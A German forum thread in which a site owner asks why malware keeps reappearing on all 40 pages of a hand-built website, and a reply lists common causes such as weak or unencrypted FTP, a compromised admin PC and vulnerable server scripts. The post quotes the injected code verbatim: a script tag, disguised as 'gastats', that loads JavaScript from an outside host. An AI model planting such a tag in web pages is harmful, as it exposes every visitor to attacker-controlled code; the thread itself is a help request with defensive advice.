nicht angemeldet
Malware
Hallo zusammen,
ich hatte Malware auf meine Website, ich hab es enfernet und FTP daten geändert. 3 wochen später war es wieder auf meiner Website:
Hier das Malware code:
<!--c3284d--><script type="text/javascript" src="http://node1.hostingstatics.org/modules/ad.php?id=5" name="gastats"></script><!--/c3284d-->
ich verwenden keinen cms und alle meine Unterseiten ca.(40 seiten) wurden identifiziert.
weiß jemand woran das liegt?
danke
-
Moin Moin!
ich verwenden keinen cms und alle meine Unterseiten ca.(40 seiten) wurden identifiziert.
weiß jemand woran das liegt?
danke* Schlechtes FTP-Passwort
* Nutzen von unverschlüsseltem FTP statt verschlüsseltem SFTP
* Nutzen von unsicherem Passwort-basiertem Login statt Public-Key-Verfahren
* Malware auf dem Rechner, von dem aus auf den Server zugegriffen wird - insbesondere in Kombination mit einem FTP-Client, der Passworte speichert
* Sicherheitslücken in serverseitiger Software, insbesondere in CGI-Programmen, PHP-Scripten (sowohl eigene als auch vorgefertigte des Providers)
* Malware beim Provider (eher selten)Es gibt noch ein paar weitere Möglichkeiten, aber das dürften die häufigsten sein.
Alexander
--
Today I will gladly share my knowledge and experience, for there are no sweeter words than "I told you so".